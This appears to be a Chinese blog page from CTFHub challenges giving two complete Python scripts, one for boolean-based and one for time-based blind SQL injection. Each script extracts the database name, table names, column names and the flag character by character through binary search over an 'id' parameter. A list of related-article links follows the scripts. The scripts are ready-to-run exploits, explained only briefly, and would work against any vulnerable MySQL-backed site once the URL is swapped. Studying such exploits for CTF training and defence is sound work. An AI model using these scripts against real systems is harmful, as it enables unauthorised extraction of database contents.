布尔盲注:

import requests

url = "http://challenge-f0b629835417963e.sandbox.ctfhub.com:10080/"

def inject_database(url):

	name = ''

	for i in range(1,100000):

		low = 32

		high = 128

		mid = (low + high) // 2

		while low < high:

			payload = "if(ascii(substr((select database()),%d,1))>%d,1,0)"%(i,mid)

			params = {'id':payload}

			r = requests.get(url,params = params)

			if "query_success" in r.text:

				low = mid + 1

			else:

				high = mid

			mid = (low + high) // 2

		if mid == 32:

			break

		name = name + chr(mid)

		print (name)

def inject_table(url):

	name = ''

	for i in range(1,100000):

		low = 32

		high = 128

		mid = (low + high) // 2

		while low < high:

			payload = "if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema = 'sqli'),%d,1))>%d,1,0)"%(i,mid)

			params = {'id':payload}

			r = requests.get(url,params = params)

			if "query_success" in r.text:

				low = mid + 1

			else:

				high = mid

			mid = (low + high) // 2

		if mid == 32:

			break

		name = name + chr(mid)

		print (name)

def inject_column(url):

	name = ''

	for i in range(1,100000):

		low = 32

		high = 128

		mid = (low + high) // 2

		while low < high:

			payload = "if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name = 'flag'),%d,1))>%d,1,0)"%(i,mid)

			params = {'id':payload}

			r = requests.get(url,params = params)

			if "query_success" in r.text:

				low = mid + 1

			else:

				high = mid

			mid = (low + high) // 2

		if mid == 32:

			break

		name = name + chr(mid)

		print (name)

def flag(url):

	name = ''

	for i in range(1,100000):

		low = 32

		high = 128

		mid = (low + high) // 2

		while low < high:

			payload = "if(ascii(substr((select flag from flag),%d,1))>%d,1,0)"%(i,mid)

			params = {'id':payload}

			r = requests.get(url,params = params)

			if "query_success" in r.text:

				low = mid + 1

			else:

				high = mid

			mid = (low + high) // 2

		if mid == 32:

			break

		name = name + chr(mid)

		print (name)

# inject_database(url)

# inject_table(url)

# inject_column(url)

flag(url)

时间盲注:

import requests

import time

#   time.time()

url = "http://challenge-a869b4d983fcacff.sandbox.ctfhub.com:10080/"

def inject_database(url):

	name = ''

	for i in range(1,100000):

		low = 32

		high = 128

		mid = (low + high) // 2

		while low < high:

			payload = "if(ascii(substr((select database()),%d,1))>%d,sleep(1),0)"%(i,mid)

			params = {'id':payload}

			start_time = time.time()	#	注入前的系统时间

			r = requests.get(url,params = params)

			end_time = time.time()		# 	注入后的时间

			if end_time - start_time > 1:

				low = mid + 1

			else:

				high = mid

			mid = (low + high) // 2

		if mid == 32:

			break

		name = name + chr(mid)

		print (name)

def inject_table(url):

	name = ''

	for i in range(1,100000):

		low = 32

		high = 128

		mid = (low + high) // 2

		while low < high:

			payload = "if(ascii(substr((select table_name from information_schema.tables where table_schema='sqli'),%d,1))>%d,sleep(1),0)"%(i,mid)

			params = {'id':payload}

			start_time = time.time()	#	注入前的系统时间

			r = requests.get(url,params = params)

			end_time = time.time()		# 	注入后的时间

			if end_time - start_time > 1:

				low = mid + 1

			else:

				high = mid

			mid = (low + high) // 2

		if mid == 32:

			break

		name = name + chr(mid)

		print (name)

def inject_column(url):

	name = ''

	for i in range(1,100000):

		low = 32

		high = 128

		mid = (low + high) // 2

		while low < high:

			payload = "if(ascii(substr((select column_name from information_schema.columns where table_name='flag'),%d,1))>%d,sleep(1),0)"%(i,mid)

			params = {'id':payload}

			start_time = time.time()	#	注入前的系统时间

			r = requests.get(url,params = params)

			end_time = time.time()		# 	注入后的时间

			if end_time - start_time > 1:

				low = mid + 1

			else:

				high = mid

			mid = (low + high) // 2

		if mid == 32:

			break

		name = name + chr(mid)

		print (name)

def flag(url):

	name = ''

	for i in range(1,100000):

		low = 32

		high = 128

		mid = (low + high) // 2

		while low < high:

			payload = "if(ascii(substr((select flag from flag),%d,1))>%d,sleep(1),0)"%(i,mid)

			params = {'id':payload}

			start_time = time.time()	#	注入前的系统时间

			r = requests.get(url,params = params)

			end_time = time.time()		# 	注入后的时间

			if end_time - start_time > 1:

				low = mid + 1

			else:

				high = mid

			mid = (low + high) // 2

		if mid == 32:

			break

		name = name + chr(mid)

		print (name)

# inject_database(url)

# inject_table(url)

# inject_column(url)

flag(url)

sql布尔盲注和时间盲注的二分脚本的更多相关文章

  1. WEB安全--高级sql注入,爆错注入,布尔盲注,时间盲注

    1.爆错注入 什么情况想能使用报错注入------------页面返回连接错误信息 常用函数 updatexml()if...floorextractvalue updatexml(,concat() ...

  2. Natas17 Writeup(sql盲注之时间盲注)

    Natas17: 源码如下 /* CREATE TABLE `users` ( `username` varchar(64) DEFAULT NULL, `password` varchar(64) ...

  3. sqli-labs(五)——盲注(boolean盲注以及时间盲注)

    第八关: 没有查询信息,输入id=1' 报错 ,也没有报错信息,这里应该是个盲注 使用boolean的盲注吧 先判断boolean的盲注可行 输入id=1' and '1'='1' %23 页面正常 ...

  4. 依托http-headers的 sql注入和时间盲注

    机缘巧合接触了一点关于sql注入的网络安全问题 依托 headers 的 sql 注入 一般来说大家都很清楚用户输入的危险性,通常会对用户表单提交的数据进行过滤(引号转码). 但是如果写过网络爬虫,那 ...

  5. Sqli-LABS通关笔录-5[SQL布尔型盲注]

    /* 请为原作者打个标记.出自:珍惜少年时 */   通过该关卡的学习我掌握到了 1.如何灵活的运用mysql里的MID.ASCII.length.等函数 2.布尔型盲注的认识 3.哦,对了还有.程序 ...

  6. sqli-labs less8-10(布尔盲注时间盲注)

    less-8 布尔盲注 首先利用?id=1' and 1=1 --+和?id=1' and 1=2 --+确定id的类型为单引号''包裹.然后进行盲注. 盲注思路: 破解当前数据库名: and len ...

  7. SQL注入之Sqli-labs系列第九关和第十关(基于时间盲注的注入)

    开始挑战第九关(Blind- Time based- Single Quotes- String)和第十关( Blind- Time based- Double Quotes- String) gog ...

  8. sql注入--bool盲注,时间盲注

    盲注定义: 有时目标存在注入,但在页面上没有任何回显,此时,我们需要利用一些方法进行判断或者尝试得到数据,这个过程称之为盲注. 布尔盲注: 布尔盲注只有true跟false,也就是说它根据你的注入信息 ...

  9. SQL注入之Sqli-labs系列第十五关和第十六关(基于POST的时间盲注)

    开始挑战第十五关(Blind- Boolian Based- String)和 第十六关(Blind- Time Based- Double quotes- String) 访问地址,输入报错语句 ' ...

随机推荐

  1. Vue结合Django-Rest-Frameword结合实现登录认证(一)

    作者:小土豆biubiubiu 博客园:https://www.cnblogs.com/HouJiao/ 掘金:https://juejin.im/user/2436173500265335 微信公众 ...

  2. 十分钟快速上手NutUI

    本文将会从 NutUI 初学者的使用入手,对 NutUI 做了一个快速的概述,希望能帮助新人在项目中快速上手. 文章包括以下主要内容 安装引入 NutUI NutUI 组件的使用 NutUI 主题和样 ...

  3. Linux基本目录机构

    Linux基本目录机构 1. 基本介绍 Linux的文件系统采用级层式子的树状目录结构 最上层是根目录"/" Linux世界里,一切皆文件 2. 目录用途 /bin: 是Binar ...

  4. Java随谈(三)如何创建好一个对象?

    本文推荐阅读时间30分钟 大家都知道,在编写Java程序里,一般就是处理各种各样的对象,那么,你知道一共有多少种创建对象的方式吗? 希望大家能稍微思考一下再往下翻. 答案是4种 new 一个对象 反射 ...

  5. Burp Suite的安装

    安装均在虚拟机环境下进行. 1.首先在浏览器找到java进行最新版本的安装. 2.然后找到burp suite 的安装包下载 不知道这一次 怎么直接跳过安装打开了.

  6. Python-通过twisted实现数据库异步插入?

    如何通过twisted实现数据库异步插入? 1. 导入adbapi 2. 生成数据库连接池 3. 执行数据数据库插入操作 4. 打印错误信息,并排错 #!/usr/bin/python3 __auth ...

  7. Spring系列之事务的控制 注解实现+xml实现+事务的隔离等级

    Spring系列之事务的控制 注解实现+xml实现 在前面我写过一篇关于事务的文章,大家可以先去看看那一篇再看这一篇,学习起来会更加得心应手 链接:https://blog.csdn.net/pjh8 ...

  8. Cortex-M3双堆栈MSP和PSP+函数栈帧

    为了防止几百年以后找不到该文章,特此转载 ------------------------------------------------开始转载--------------------------- ...

  9. selenium学习之元素等待(四)

    --为什么要设置元素等待: 目前大多数web应用程序都是使用AJAX和JavaScript开发,每次加载一个网页,包括静态网页和动态网页,也就是加载各种HTML标签和JS文件.在网页中进行元素定位时, ...

  10. JavaScript innerTHML和createElement效率对比

    前言: 在DOM节点操作中,innerTHML和createElement都可以实现创建元素.它们实现的功能类似,但是效率却相差很大.本文分别统计用innerTHML字符串拼接方式.innerTHML ...